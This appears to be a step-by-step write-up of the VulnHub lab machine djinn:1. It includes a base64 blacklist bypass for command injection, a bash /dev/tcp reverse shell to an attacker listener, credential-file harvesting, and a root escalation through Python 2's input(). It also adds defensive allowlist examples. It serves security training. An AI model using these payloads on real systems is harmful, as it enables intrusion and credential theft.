VulnHub machine: djinn:1
Goal: obtain user.txt and root.txt
Machine setup
After downloading the machine, open it in VMware. Before powering it on, set the network adapter to NAT so it sits on the same segment as the Kali attack box.
Penetration test
Scan with nmap
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST
Nmap scan report for 192.168.5.130
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.5.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '*', 4)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 9)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.86 ms 192.168.5.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.43 seconds
Port 21 is open and allows anonymous login as user ftp; port 22 (ssh) is filtered; the banner on port 1337 shows it is a game, and answering 1000 questions earns a gift. Port 7331 is an HTTP service, reached at IP:7331.
Testing port 21
After logging in anonymously, download the three files in the directory.
└─# ftp 192.168.5.130
Connected to 192.168.5.130.
220 (vsFTPd 3.0.3)
Name (192.168.5.130:root): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (3.9378 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.01 secs (9.0051 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (707.3818 kB/s)
ftp> exit
221 Goodbye.
View the contents
└─# ls
creds.txt CVE-2018-7600 game.txt message.txt
└─# cat creds.txt
nitu:81299
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
This yields a credential: nitu:81299
Since port 22 is filtered, test port 1337 first.
Testing port 1337
└─# telnet 192.168.5.130 1337
Trying 192.168.5.130...
Connected to 192.168.5.130.
Escape character is '^]'.
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '*', 7)
> 42
(3, '*', 3)
> 9
(9, '/', 1)
> 2
Wrong answer
Connection closed by foreign host.
A correct answer lets the game continue; a wrong answer closes the connection immediately.
So write a script to answer the 1000 questions.
#coding:utf-8
import logging
import re
import telnetlib  # note: telnetlib was removed from the standard library in Python 3.13
import time


def calc(res):
    # Turn the prompt text "(6, '*', 7)" into the answer the game expects
    res_str = res.strip('(').strip(')').replace("'", "")
    nums = res_str.split(',')
    number1 = nums[0].strip()
    operator = nums[1].strip()
    number2 = nums[2].strip()
    # eval is acceptable here: the three fields come straight from the game
    # prompt and have just been split into two operands and one operator
    res = eval(number1 + operator + number2)
    return res


def main():
    try:
        tn = telnetlib.Telnet('192.168.5.130', port=1337)
    except OSError as exc:
        logging.warning("connection failed: %s", exc)
        return None
    time.sleep(0.5)
    loop = 1
    # The server expects 1001 answers before it hands over the gift
    while loop < 1002:
        data = tn.read_very_eager().decode('ascii')
        print(data)
        # The question is the line immediately before the "> " prompt
        match = re.search(r'(.*?)\s>', data)
        if match is None:
            # The next question has not arrived yet; wait and read again
            time.sleep(0.1)
            continue
        res = match.group(1)
        datas = str(calc(res)).strip()
        print(str(loop) + ":" + datas)
        loop = loop + 1
        tn.write(datas.encode('ascii') + b"\n")
        time.sleep(0.1)
    # Final read picks up the gift message
    data = tn.read_very_eager().decode('ascii')
    return data


print(main())
The gift is obtained: 1356, 6784, 3409
>
997:1.4
(2, '+', 2)
>
998:4
(3, '+', 6)
>
999:9
(4, '*', 9)
>
1000:36
(7, '/', 7)
>
1001:1.0
Here is your gift, I hope you know what to do with it:
1356, 6784, 3409
Use the secret sequence (port knocking) to open the ssh port
knock 192.168.5.130 1356 6784 3409
Scan again with nmap
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 11:11 CST
Nmap scan report for 192.168.5.130
Host is up (0.00076s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.5.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA)
| 256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA)
|_ 256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '/', 6)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 8)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.5.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
Port 22 is now open.
Testing port 7331
Since it is an HTTP service, run a directory scan.
└─# dirsearch -u "http://192.168.5.130:7331/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520
Output File: /root/.dirsearch/reports/192.168.5.130/_21-09-10_11-17-08.txt
Error Log: /root/.dirsearch/logs/errors-21-09-10_11-17-08.log
Target: http://192.168.5.130:7331/
[11:17:08] Starting:
[11:17:31] 200 - 385B - /wish
[11:18:09] 200 - 2KB - /genie
Task Completed
Visit the site.
The page says it will grant any wish; try entering whoami.
The command output appears in the URL of the returned page, so there is a command execution vulnerability here.
Try to dump the password file.
The request is blocked, so use Burp to test every special character.
The following special characters are found to be forbidden:
; / ? * ^ $
So try a base64 bypass.
On the local Kali box:
└─# echo "cat /etc/passwd"|base64
Y2F0IC9ldGMvcGFzc3dkCg==
In Burp:
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
cat /etc/passwd executes successfully.
Reverse shell
Listen locally:
nc -lvnp 9000
On Kali, run:
└─# echo "bash -i &> /dev/tcp/192.168.5.129/9000 0>&1"|base64
YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo=
Then in Burp, submit:
echo "YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo="|base64 -d|bash
A shell is obtained:
└─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.130] 42968
bash: cannot set terminal process group (730): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
Upgrade to a Python pty shell; without it, su cannot be used to switch users.
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal
python3 -c 'import pty;pty.spawn("/bin/bash")'
Several files are found in the current directory; view them with cat.
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False


@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")


@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True,
                                      stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"
        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')


@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"
    return render_template('genie.html', file=page)


if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
The filtering happens here; the RCE list is the blacklist of forbidden characters.
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False
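As an added illustration (not code from the box or from this post), the blacklist check from app.py is reproduced beside an allowlist design that treats the wish as a lookup key and never hands user text to a shell; the allowlist entries and function names are assumptions for the example:

```python
import subprocess

# Copied from the page's app.py: the blacklist and the creds path
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
CREDS = "/home/nitish/.dev/creds.txt"


def validate(cmd):
    """The original check. It compares every single character of cmd against
    every blacklist entry, so only one-character entries can ever match (the
    "eval" entry is dead code) and any command built from characters outside
    the list, such as the base64-decode pipeline used above, passes."""
    if CREDS in cmd and "cat" not in cmd:
        return True
    for i in RCE:
        for j in cmd:
            if i == j:
                return False
    return True


# Hypothetical allowlist: each wish maps to a fixed argv with no user data in it
ALLOWED_WISHES = {
    "whoami": ["whoami"],
    "date": ["date"],
    "uptime": ["uptime"],
}


def resolve_wish(cmd):
    """Allowlist check: returns the fixed argv for a known wish, else None.
    The user's text is only ever used as a dictionary key."""
    return ALLOWED_WISHES.get(cmd.strip())


def run_wish(cmd):
    """Runs a resolved wish without a shell (no shell=True), so pipes,
    redirects and encoded payloads have no meaning even if present in cmd."""
    argv = resolve_wish(cmd)
    if argv is None:
        return "Wrong choice of words"
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Constructed input with the same shape as the pipeline submitted via Burp above
BYPASS = 'echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash'

if __name__ == "__main__":
    print("blacklist lets the pipeline through:", validate(BYPASS))       # True
    print("blacklist blocks a plain cat:", validate("cat /etc/passwd"))   # False
    print("allowlist resolves the pipeline to:", resolve_wish(BYPASS))    # None
    print("allowlist resolves whoami to:", resolve_wish("whoami"))        # ['whoami']
```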
CREDS is a path string; use find to locate the file.
www-data@djinn:/opt/80$ find / -name *creds* -print 2>&1| grep -v "Permission denied"
<me *creds* -print 2>&1| grep -v "Permission denied"
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
Two matches are found:
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
/srv/ftp/creds.txt is the file downloaded from FTP earlier, containing nitu:81299.
View /home/nitish/.dev/creds.txt with cat; its contents:
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
This gives nitish's password: nitish:p4ssw0rdStr3r0n9
Switch user with su and obtain the first flag, user.txt.
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$
nitish@djinn:/opt/80$ cat /home/nitish/user.txt
cat /home/nitish/user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
Privilege escalation
Check sudo permissions
nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
The genie command can be run as sam, and no password is required.
nitish@djinn:/opt/80$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
After trying them, none of these options are of much use; check the man page for more.
nitish@djinn:/opt/80$ man genie
man genie
WARNING: terminal is not fully functional
- (press RETURN)
man(8) genie man page man(8)
NAME
genie - Make a wish
SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish
DESCRIPTION
genie would complete all your wishes, even the naughty ones.
We all dream of getting those crazy privelege escalations, this will
even help you acheive that.
OPTIONS
wish
This is the wish you want to make .
-g, --god
Sometime we all would like to make a wish to god, this option
let you make wish directly to God;
Though genie can't gurantee you that your wish will be heard by
God, he's a busy man you know;
-p, --shell
Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"
-e, --exec
Execute command on someone else computer is just too damn fun,
but this comes with some restrictions.
-cmd
You know sometime all you new is a damn CMD, windows I love you.
SEE ALSO
mzfr.github.io
BUGS
There are shit loads of bug in this program, it's all about finding
one.
An undocumented-looking parameter -cmd is listed.
Try genie -cmd id: it runs normally, and on exit it prints a rather mocking "You are a noob hacker!!"
nitish@djinn:/opt/80$ genie -cmd id
genie -cmd id
my man!!
$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
$ exit
exit
You are a noob hacker!!
Run id as sam; the switch to sam succeeds.
nitish@djinn:/opt/80$ sudo -u sam genie -cmd id
sudo -u sam genie -cmd id
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
Check sudo permissions again
sam@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
The lago command can be run as root, and no password is required.
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
After trying each option, nothing exploitable is found here.
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!!
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: 52
52
Better Luck next time
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
3
Enter the full of the file to read: /etc/passwd
/etc/passwd
User root is not allowed to read /etc/passwd
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
Transfer the file via base64: run base64 app.pyc, then copy the encoded output to the local machine and decode it to recover the original file.
sam@djinn:/opt/80$ base64 app.pyc
base64 app.pyc
Write the encoded output into a local file named app64.
┌──(root💀kali)-[~/cve]
└─# vim app64
Decode it:
┌──(root💀kali)-[~/cve]
└─# base64 -d app64 >> app.pyc
Decompile with uncompyle6
uncompyle6 -o app.py app.pyc
Note that in uncompyle6 -o app.py app.pyc the -o option must come before the input file, and uncompyle6 currently only supports Python 2.7 through 3.8.
Decompiling on Windows with Python 2.7 is recommended.
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:25:05) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 21:05:18
from getpass import getuser
from os import system
from random import randint


def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
Reading the source, its strings match exactly what /root/lago prints.
def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'
If num is entered here, the comparison succeeds and system('/bin/sh') runs. This works because Python 2's input() evaluates the typed text as an expression in the function's own scope, so the text num resolves to the secret variable itself.
When system('/bin/sh') runs as root, the result is a root shell.
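To make the input() behaviour concrete, here is an added example (not the box's lago) that models Python 2's input() in Python 3 with eval and places it beside a version that parses the guess as an integer; the function names are assumptions, and no shell is spawned:

```python
from random import randint


def guess_py2_style(answer_text, num):
    """Models the decompiled guessit(): Python 2's input() evaluated the typed
    text as an expression with the function's locals visible, so 'num' names
    the secret itself. Returns True when the comparison would succeed and
    system('/bin/sh') would have run. Builtins are stripped here only to keep
    the demo contained; the real input() had them available."""
    s = eval(answer_text, {"__builtins__": {}}, {"num": num})
    return s == num


def guess_hardened(answer_text, num):
    """The fix (raw_input() in Python 2, input() in Python 3): the typed text
    is data, and only a literal integer can ever compare equal to the secret."""
    try:
        s = int(answer_text.strip())
    except ValueError:
        return False
    return s == num


def play(answer_text, num=None):
    """One round through both checkers; num defaults to a fresh secret drawn
    with the same randint(1, 101) as the original."""
    if num is None:
        num = randint(1, 101)
    return {"py2_input": guess_py2_style(answer_text, num),
            "hardened": guess_hardened(answer_text, num)}


if __name__ == "__main__":
    # Constructed inputs: a literal guess and the variable-name trick from the post
    print(play("52", 37))   # {'py2_input': False, 'hardened': False}
    print(play("num"))      # {'py2_input': True, 'hardened': False} for any secret
```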
Use /root/lago to escalate privileges and obtain root.txt
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Fri Sep 10 11:13:19 IST 2021
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
Notes
Without service detection, an nmap scan may not identify port 7331 as an HTTP service:
└─# nmap -p- -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 13:44 CST
Nmap scan report for 192.168.5.130
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
After the nc reverse shell, su may not work unless the shell is upgraded:
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal